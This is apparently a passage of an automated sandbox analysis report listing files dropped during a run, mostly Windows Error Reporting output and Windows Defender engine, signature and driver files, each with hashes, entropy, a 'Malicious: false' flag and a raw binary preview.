Preview:	MDMP..a..... .......F.`a..............................bJ..............GenuineIntel...........T...........:.`a.............................0..2...............G.M.T. .S.t.a.n.d.a.r.d. .T.i.m.e...................................................G.M.T. .D.a.y.l.i.g.h.t. .T.i.m.e...................................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.9.0.4.1...5.4.6.....................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDDDF.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8338
Entropy (8bit):	3.7041735654765717
Encrypted:	false
SSDEEP:	192:R9l7lZNiMtL6ogk8e6YwDpSU0hpgmfkBXn/ApD489bC5lfbOA2m:R9lnNiMx626YiSUwpgmfkBoCrfbOY
MD5:	362D1A0185C1EFB98B7CF66D58B85025
SHA1:	0C10AF262A8FCFC508854639A09A1050D7FB99B9
SHA-256:	64A03DBD3174644EBCCAC1F6715DCF02B62A9C027EC0B150A0A3CD8A738D1CC0
SHA-512:	CDE45E5DE1AC8B862B972EB803AA19F203275CEDCBC3F5ADBF040821D200F7E575FA7B453B8D77B84B1A3173CCEB39AA95D352B56DFD1B8679E23797090CCEB2
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.4.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDF09.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4824
Entropy (8bit):	4.54028559935987
Encrypted:	false
SSDEEP:	48:cvIwwtl8zsCe702I7VFJ5WS2CfjkRhs3rm8M4JPDKF1+q86s+QPuBZwd:uILfn7GySPfzJKvQPYZwd
MD5:	7B31EF70527F0A303502E0C8B2014B7D
SHA1:	A30F0D92A5E5E6098A8894C228B7DE849FEE0C75
SHA-256:	BE7377D3E30538337F060F7F2A26971B980737405EAC29B45B3D155C88F85776
SHA-512:	1CDCA71A053033B643BF5DE55E15A6F620E12760B9D6425A1FB5AD2ADDABD5AEB6184C3DAE4F49FCF2BB5BD4F73C43C1BC8C37A29CDBF6EA86ABEB579FF56322
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="221299965" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\1.1.18500.10_to_1.1.18600.4_mpengine.dll._p Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe
File Type:	data
Category:	dropped
Size (bytes):	2651471
Entropy (8bit):	7.999536880042175
Encrypted:	true
SSDEEP:	49152:/ATHbjm/iIcfAPkDFdv14M/XGgXqzwoDXK0wo2Ufj8BYuMmLNaCvruHEmWg:/gbHIvq/vlPGgap60PJ8TJaGrMOg
MD5:	1CD7E427BF1B88ED6CA3D330F89F41BA
SHA1:	F202BE4AD9A5C456B8454C40CECFCB4342E84983
SHA-256:	6AD6B43A7EDE4C123CA014EAE51C020C81D663E3145E1E7A1F912A40CAFEFB3B
SHA-512:	1E6FC265D3FF0AF6FF66BE5F837BB91EC5D1B340D9F790FAD2268F19BAA912C205E899F9E918E58945E5A57904AC7D0565AE720E8195C0FD3D78C380DBA9B642
Malicious:	false
Preview:	PA19......_a(\|f..b...h ..cI....(j!.n.\|...w.p...!..D..=.......""H..;%.P.#.Q.....Tm.Rth.(Za.%...Z.;...."....................}...5/2-....{0Il....{..no...~o^w...................q....{...o...._.}qwz..l.;...&.z...{..n.[.n......[oN......6.MG.@n.O...$..m.K.a.....H..........(..!.P......_./@ $.1....Y.......6.....;Y..\.u...`W.G .d.e....XG+)$A.r$......H..<....Jf. )..L 0r.mc..n(.K.e @n8.-.A.2Gw..,...lld.32..bs.6....Q.....cj..4.o....L.<21....&r@AInLb...%.......9..tp.$'Q..r.S..o.9...e].....hr.W...,CAo/I......~....z.H........o.$.}...........................f..f.........;.9.w.9...3..r.2.6.2w.....]..T%..I..W.TR.2.47.Q!...,...ie..$......,M.....Ah..2....P.. ......'y..S}.A.M.....2..U.u.}.A.Q..Km.q.\,..eUQ..0.[G.......]A.y:.-....p..5.c..^._.=a.I^s7..~.......S..\...;.$,8.e]9.].r9=a.:..~3 '...&.x.{.)....L.G5.9.0...Bk....2...5.#]...^iM.z@f.....f.n.....Z.{.[%-.}.S]W]..b..$...g}...nM..e....L.V..D+[......?.~=.....6+..S..R......J..O.r.....rC....Vo..+.J>....

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\1.349.0.0_to_1.351.0.0_mpasbase.vdm._p Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe
File Type:	data
Category:	dropped
Size (bytes):	6947288
Entropy (8bit):	7.998652520745969
Encrypted:	true
SSDEEP:	196608:Z6h8S1WVWjjc7Wf7zlW0qg2eUCJj6oZT32FBN6DIz:M+S1q7S7BWvMzJxBYHz
MD5:	46F037977005B7E9F8711C1CE7245C6B
SHA1:	B04BB6DE0F9F5A2B12C52124AD514D324EF3B616
SHA-256:	3D38C95836DB5540D4354BDA13A83091BF144A907A831604898D9F864126A4D0
SHA-512:	8D84FDCE9A81422A10AA1CC6B450EEA1E593F16DBF57D00A313C3AA9B03BB41F6A94FF8D4739C1ED79B3ED6F1CBF203F455BCCE6654C103BB5294599E47CDC16
Malicious:	false
Preview:	MPSP..j.....8..x..]u\.O._:D$$.E0.AEQQLJ......T..y..n.DA.1PT.n1...nL...;..{.{..q............&..\|."S....J....W..TR..)W..[5J..!..&...e...=...Y.$mdz..R.V.".FQ.....iI.ljk.....!J.Sem...Q>.....+T.6..y..\W.u...P../..=.2Mox...~..k.n...........V....O3U....wS%6....D.2)NC..q!..2.-J..h=~i.p...DF4.&#.x......54.z.\|.(W..Li..`2.R?.^W2.2.kfB.$d..3..(>..iJ...9.$..J..H.dB...LcmU.:..U.....Ua...H.FS..yE...E;..`..P#..M.!.j..6....M..Z.......C...@.<..Kj..T.......mU...2.D.C.....PG.&.)9.M..AU.......LM;fm={..n....!J.SW74.......jS.h-..J9....I.%'.c.....t..(.....aQ..X..L.;.....k.i..>N.!.i..y.X.2..g...j.,=.>..7m..A....9@........5.J......Kw..0W..r2.)...h...(i>.&>A0...`D.c...).3.mL......;.&..6......)...E....)J..?K..%..;..D]..(S.yx.g.B]....D........5..5...L.+Y.N..R3..z.s.....5H..Y.....$../o.$....(.fx-/.";.no.M...vn...l..p.f.*.......X.;W..90..A...kH6^C.u..l...6.....:.P......\|.F.k.(..t.....3s..iT...;%.e.D..'m.e.r..YP......^1,...........2O..,`........IQ<K.

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\1.349.0.0_to_1.351.0.0_mpavbase.vdm._p Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe
File Type:	data
Category:	dropped
Size (bytes):	5295896
Entropy (8bit):	7.997749364950445
Encrypted:	true
SSDEEP:	98304:+3t2My1jJFqD1nlxmI5zN8KGixmH8l2snrho+qico1hSWmnSEOR69MaKJD:+92M8DqTx/dN81iUHooKcofHDZEMaKJD
MD5:	F2E9F2343E044B331ECAF82302F5EC4B
SHA1:	049E866B3C7385DD7B00BBEC39453C30B8D29C28
SHA-256:	77AF289327742CC4F520092AA6429A5B829E24F40653DF71D00E31EFF9F3737F
SHA-512:	080509E98915BE390AE6A1ABA880248E98DE10D77AF107FB266DC34CECD43EED9CE77F53C6568C20FA1222DBA1D3FDB79E820656C0B28E1316DA93500C580A79
Malicious:	false
Preview:	MPSP..P..Au.[.Aex.l..xTW.6.I ......'..C\p.Dq.....<..!..Cp.BK..H.B..w.s2....}.{]o.s.......j.)m.e._....N.L.,...:......!..g.UN.sH.t../...\|6F.F.C.f....d..N./.2^.bc..)..6...F![...BJ&.g\....%....f5.r.:...L..$..L6&.,.v=.Me..F...lF.Ou;.C....R..3.).....G...,..../..f.7U..o.2....VA..OV.7r.\|.......M?......eS$K...w.ic......y^S..&S.e.J..3..`2.y..4...iT.3..+mL(W'....L...&..&..1MI_J..\|...f..eZ..dZ{&.i.n...e.s.X..).i..th...._M...f..mLgc...3..n.C....25.5=X]..8}.k.!YR..8{>...u...`H.c'.w.K.sxN........z.0.......MN..m.lk........&4..zY....?..O..@f..j.@...i ..}..jH..tf5ekb.........^...T.4...m.c[.ZY....YZ.l.T..u.....g1..~.eV. F....d.o....M<.5L7..AOl.+......D`l...hO.'..X..;.x...=q....zS..c".J.....1D.s...(1T..`zc...q...Q.74..I.ug.(.0..g.D;1..Ty..3.....t.}......a...`.D..I.`"1..L7.`....A.p.............g..M..........J.../.6..._..-e.i.h.z.J...ALw..[...3d...iLo.)..$.?Nk..,a...V.++..v.-I.T~..M..'1}qj.,.....O.......X..3_.p...\|z6.pm.........+.).,....^.j.h...d4..D..[,.

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	803176
Entropy (8bit):	6.37118649960636
Encrypted:	false
SSDEEP:	24576:Ghj1QlBYDgtUUvie3n+pB3+ojRlcD1VyZTFXk:GhpQlBHtBYla1VyZpU
MD5:	01F92DC7A766FF783AE7AF40FD0334FB
SHA1:	45D7B8E98E22F939ED0083FE31204CAA9A72FA76
SHA-256:	FA42B9B84754E2E8368E8929FA045BE86DBD72678176EE75814D2A16D23E5C26
SHA-512:	BEA5F3D7FB0984C4A71720F25644CE3151FCDC95586E1E2FFE804D04567AAF30D8678608110E241C7DDF908F94882EDDD84A994573B0C808D1C064F0E135A583
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: l8w9YB1n38.exe, Detection: malicious, Browse Filename: Monex Payment Declined CTE21081157582 EUR 81300.00_PDF.exe, Detection: malicious, Browse Filename: Udtrt.exe, Detection: malicious, Browse Filename: MT103_SWIFT.exe, Detection: malicious, Browse Filename: MT103_SWIFT.exe, Detection: malicious, Browse Filename: EVOLUTION TRADE Sp. z o.o. OFERTA 09212.exe, Detection: malicious, Browse Filename: tZz20galQf.exe, Detection: malicious, Browse Filename: Guloader.exe, Detection: malicious, Browse Filename: 8hIPR0n66X.dll, Detection: malicious, Browse Filename: Struggleres5.exe, Detection: malicious, Browse Filename: FACTURA.exe, Detection: malicious, Browse Filename: LISTA DE PEDIDO DE COMPRA.exe, Detection: malicious, Browse Filename: Unreal.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B..#...#...#..EV...#...Q...#...Q...#...Q...#...Q...#...#..."..EV..#..EVN..#..EV...#..Rich.#..........PE..d.....P.........."......`....................@.............................0.......-....`.......... .......................................t..d....... ........D... ..h!... ......d...p.......................(......8...........0................................text...2R.......`.................. ..`.rdata.......p... ...p..............@..@.data..../....... ..................@....pdata...D.......P..................@..@.rsrc... ...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpasbase.vdm Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	53072304
Entropy (8bit):	7.997563930648501
Encrypted:	true
SSDEEP:	1572864:P0U1SslLDBQpTRKb0o76I0RUgRS2uc62zNWPy:P0UplL2tRW0aV0RpS2lTey
MD5:	0157CF1D00DB2F06270440CED26AD2DA
SHA1:	E0DA67E235AF6B8DDBA9736504E7638BFF4DB4B0
SHA-256:	15C43FFD2F73BA5E6A0E0A3B845A6FD61EE9E12220C0D98CBDB9E59D6E188914
SHA-512:	0264329D824734BC9BFE3129E4653E5293EFC96555EE98909DD19B37A010747C6368247784972AE478DBC16EF5E031FF99A283CF371F21278DBCE9E94DABAAC5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<..R...R...R......R..P...R.Rich..R.PE..d....<_a.........." ..........)...............................................).......)...`.......................................................... ....)...........)..!...........................................................................................rdata..p...........................@..@.rsrc.....).. ....).................@..@.....<_a........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... ...)..rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpasdlta.vdm Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	56256
Entropy (8bit):	7.8865781490907585
Encrypted:	false
SSDEEP:	1536:JwR66b4yTEWjtF1x6Xuj/95BE9EzeTj3:J06y/PtTxAuZ5+W2
MD5:	D4A106B61C81FEEAD6CFB5C528812E1F
SHA1:	DFBFDED32E2BF05D407C9CB5B18FD8E8B3EE21DE
SHA-256:	3066FDA0371BAEBF09CF54502B77BB6CA9060966BD70C693D4A56DA01AB0F729
SHA-512:	AB8E503AC883CFEFB12178FBC8950655D371A92F533ADDE64CBE63EC2CF9DFAF843ACCBC33028C214704FA8F6B82DF0C78CB97C7EB20D68DF8806073F16E9CA3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<..R...R...R......R..P...R.Rich..R.PE..d...]._a.........." ......................................................................`.......................................................... ...................!...........................................................................................rdata..p...........................@..@.rsrc........ ......................@..@....]._a........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... ......rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpavbase.vdm Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	55848880
Entropy (8bit):	7.995585481148423
Encrypted:	true
SSDEEP:	1572864:iy6w1liQqicAsNBasl5IY/hOO0S7WGB9F9L4hxZB:B6uiQqiTE8kIYJn+wFZ4XB
MD5:	7E2B83A39CC26B2B617F404A89B6661C
SHA1:	198F9D59A90993247182EE11AE33AB52E5011C44
SHA-256:	8ED02ED1D817FA7B68466F11F55A2289D82BDD22A360246624BA0F9220D17EE3
SHA-512:	BF29A223DFF577DB8967DBEA610DC6DB2D6C0152A896E8BCC851EB67E84AF5367E4A01AC6110554C2813E974EBA9B8C04C2EB03422DCCDE00B1FA8D7F629C55F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<..R...R...R......R..P...R.Rich..R.PE..d....<_a.........." ..........T..............................................0T.......T...`.......................................................... ..@.T...........T..!...........................................................................................rdata..p...........................@..@.rsrc...@.T.. ....T.................@..@.....<_a........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... ....T..rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpavdlta.vdm Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	modified
Size (bytes):	27072
Entropy (8bit):	7.694916420706485
Encrypted:	false
SSDEEP:	384:bW+dNWba5rbEmIxwjJPnLH5quZaC6HTY/0k2IYWmsntxQSElLlmF+gEQmDWlGs3R:7dPnZtjJPLZqucH5xIXnDQSi1zU
MD5:	F80B853B4DE2B156C4927CC201A1BD46
SHA1:	974333665EB814A71294FBE557DE6BDDBA39DA3C
SHA-256:	94E30E97B9D162D2CAF884F4796D704ED1A2E374A895A90429B4CE26CF3801A6
SHA-512:	E01DA9AAAEB50BA88814E7FB5A9F0A0B4BC25E3D856B2B2C0B93255C93B0EC0E62F6AFF4F157C7AF580DEF352F2AC9A094FC597475ED252FEBE9407EE2B7446E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<..R...R...R......R..P...R.Rich..R.PE..d...]._a.........." .........F...............................................p......8.....`.......................................................... ...C...........H...!...........................................................................................rdata..p...........................@..@.rsrc....C... ...D..................@..@....]._a........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... ...B...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ConfigSecurityPolicy.exe Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	454904
Entropy (8bit):	6.2829164628823575
Encrypted:	false
SSDEEP:	6144:p+BaOdQrqYpWVCPpYXe14f6eFL+TFFzE/tzkY5WwuTWOahE:kQ2YpWkPiXe14f6eFL6FA/zWwgChE
MD5:	065E4E5BE96865266D1FC4449274CE20
SHA1:	C6FF45B448F7B828D8C6369B5DE95B41E685F502
SHA-256:	98E3951BA9FACFB2B878D98D237D63C675878A09D9B6E18640C96746B6665041
SHA-512:	E63A5CF20678757F3FA277C56576F0DFBFF41DCBE61BEEFF28C608EE5D2BE2766E16A93E2FC423E6697670AC7E164E2B29EE5755AADAAE1C58B6F6F3FE1A6481
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............._..._..._...^..._..x_..._K..^..._K..^..._K..^N.._K..^..._..._..._...^..._..._..._...^..._Rich..._........................PE..d......m.........."..........P.......u.........@.....................................]....`.......... ...................................................#...p...9....... ...... ...8f..p...................8...(.......8...........`...8............................text............................... ..`.rdata...u..........................@..@.data...PD... ...0... ..............@....pdata...9...p...@...P..............@..@.rsrc....#.......0..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\DefenderCSP.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	303352
Entropy (8bit):	6.103843753653899
Encrypted:	false
SSDEEP:	6144:6CFCIAsyTqaF2uNoLQ7iF5K8+v5y8hCs2Y:6ypfyTqIL6LQ7iF5K8+484BY
MD5:	8C7A45FC0FDFB95104C84A68EAFBD170
SHA1:	D770064F1956FF05248E4C56DCF511928A7D8C3F
SHA-256:	B0A45EEB123840F105A40DB938553801C54DC5EED5FD2F710AC7EA24E16D0B56
SHA-512:	CD0B5A72D12B513B9EE160C1A18275893480488378A0E8E241600F0DCB1275B1F3CDC3C0096345D9A2B942C800484DC0E5210E0C4B409D5FE69B94716CE432FF
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q[.'5:}t5:}t5:}t.O\|u7:}t.O~u4:}t<B.t1:}t.H\|u,:}t5:\|tM;}t.Hyu(:}t.H~u;:}t.Hxu.:}t.O}u4:}t.Otuy:}t.O.t4:}t.O.u4:}tRich5:}t........................PE..d...c..P.........." ......................................................................`A........................................0...p............p.......@..`$....... ......8.......p...................h@..(...0?..8............@...............................text...L........................... ..`.rdata..............................@..@.data....-....... ..................@....pdata..`$...@...0...0..............@..@.rsrc........p.......`..............@..@.reloc..8............p..............@..B................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdBoot.sys Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	48520
Entropy (8bit):	6.2073261328907865
Encrypted:	false
SSDEEP:	768:0WfrO9dZBf9slBe+eRPKUjKHWPkKrdtBGgz:1ybZMrCKUjKulLBH
MD5:	1BF7CF2DBA97C71FF1876F0DE67421C3
SHA1:	48DFEC30B75138FCAF5DFFE16CB9822BA4CC4178
SHA-256:	B946398AB34EF5BF16DC3461D32261664760C0F86E8A281BCD90361A170E27FD
SHA-512:	11E1E1C339F9BFFC83919946ACFA6F3D5CC1C7494A21629332004E2445AAE919A0E014366DFDCE7764C934E1F7C2C0CABAAFF0179C8A145DBB0759BAE218F540
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......kM.W/,../,../,../,...,...^..*,...^..,,...^..=,...^..),...Y..$,...Y}..,...Y...,..Rich/,..........PE..d...9............."......d...4...........................................................`A.................................................q..<.......`....`...........!......@....8..p...........................@0..8............p..`............................text............ .................. ..h.rdata..0....0.......$..............@..H.data........P.......8..............@....pdata.......`.......<..............@..H.idata.......p.......@..............@..HPAGE...../.......0...H.............. ..`INIT.................x.............. ..bGFIDS...$...........................@..B.rsrc...`...........................@..B.reloc..............................@..B................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdDevFlt.sys Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	164072
Entropy (8bit):	6.14800914066086
Encrypted:	false
SSDEEP:	3072:A1y1RnaePd+RhtbV0vgn8wNgaZp8kdiQfH4M4mD:3naePkRhtbV0vrwNgaZp8G7fYe
MD5:	26B890C2237E48DAF8B9B901EBE7A0C1
SHA1:	08976CF446255E9BB538B8540BBE0DD4BF3E8A65
SHA-256:	B1D793E12DBF2CE5197960454F0A5AE6C93703FA5BF2D7622EC0FDFBAC183211
SHA-512:	F580903A15E67888F714CA073D4B56C349131D2C03769092794656E538E0501CCAAC4B563311346B22AD8F81302FE2FBE22F4F6B1BD352BC4213EAED7F7F25D1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d.i. ... ... .......#... ..........'...............%...............!.......!...Rich ...........................PE..d...l:..........."..................X.....................................................A....................................................P....p...............`... ..............p...........................Pb..8............................................text...*O.......P.................. ..h.rdata...Y...`...\...T..............@..H.data...............................@....pdata..............................@..H.idata........... ..................@..HPAGE....!).......,.................. ..`INIT.....)...0...,.................. ..bGFIDS........`.......@..............@..B.rsrc........p.......D..............@..B.reloc...............L..............@..B................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdFilter.sys Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	434424
Entropy (8bit):	6.350342003442293
Encrypted:	false
SSDEEP:	6144:EF/vuF3th9Gf4GYapoQm1RGpIk6IjKtGnpPVzcZYac3UA2dwcSogCYog:EYFdhQgGYNPR8Iv1gpP+2oG
MD5:	B6C6FFC05B52D2F8A433DD12C3A11D30
SHA1:	F221740A99726722E5F5DF8CC3A0182436060A46
SHA-256:	666259E830F5EAC0707B2D957944B7468FA645271C60B8EA54E5130B8336D1F6
SHA-512:	1B0ABBB15A3018B584B0239C04A94E38FE433D382771BF8CFFAECC5B8776AC87DBC4278B4D2E0A341026F3B9FF43B84F604A52797D134E2C3881ADF03C9358F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Qm.0..kc..kc..kc..jc..kc.~jb..kc.~nb..kc.~ob..kc.~hb..kc.ycb-.kc.y.c..kc.yib..kcRich..kc................PE..d....5............"......L...4.......H..............................................=......A...................................................P....p.......`..4#....... ...........!..p...........................P...8............................................text............................... ..h.rdata..H}..........................@..H.data...d....P.......D..............@....pdata..4#...`...$...L..............@..H.idata...,.......0...p..............@..HPAGE.....-.......0.................. ..`INIT.....[.......\.................. ..bINIT.........P.......,..............@...GFIDS...<....`.......4..............@..B.rsrc........p.......8..............@..B.reloc...........0...P..............@..B................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdNisDrv.sys Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	86264
Entropy (8bit):	6.087010539108971
Encrypted:	false
SSDEEP:	1536:xFbk8rfBGjiGUQiQ5Df0uEWWH1shZJ+Rb7NvmoHPNr:xFbprZGuzQnjR81shW5JvmCFr
MD5:	9C4361259D5F0D7A36A10BD28D000F90
SHA1:	F1CB41DB2356666AD123686B0AD52A2112D91474
SHA-256:	7445476DE9BAB0D9C975DBDF63BD928D7E3139DF3FC69463BF08897E3B087575
SHA-512:	55863A0B999439CD0C1747A81BD34991D81C631571797CC6F6335B60F1D054EB31951418DAF5587ADC43F65F16711482FBC82D0F0C9495CFBA834919FDBF9264
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........U..U..U.....Q..U..,.....R.....E.....S....Z...%.T....T..RichU..................PE..d....%.........."..........\.......`....................................................`A................................................h...P....................0... ......H...X...p...............................8...............@............................text...*........................... ..h.rdata..p .......$..................@..H.data...(...........................@....pdata..............................@..H.idata..............................@..HPAGE....H ...0...$.................. ..`INIT.........`...................... ..bGFIDS........p......................@..B.rsrc...............................@..B.reloc...............$..............@..B........................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Microsoft-Antimalware-AMFilter.man Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	12624
Entropy (8bit):	5.259327730394375
Encrypted:	false
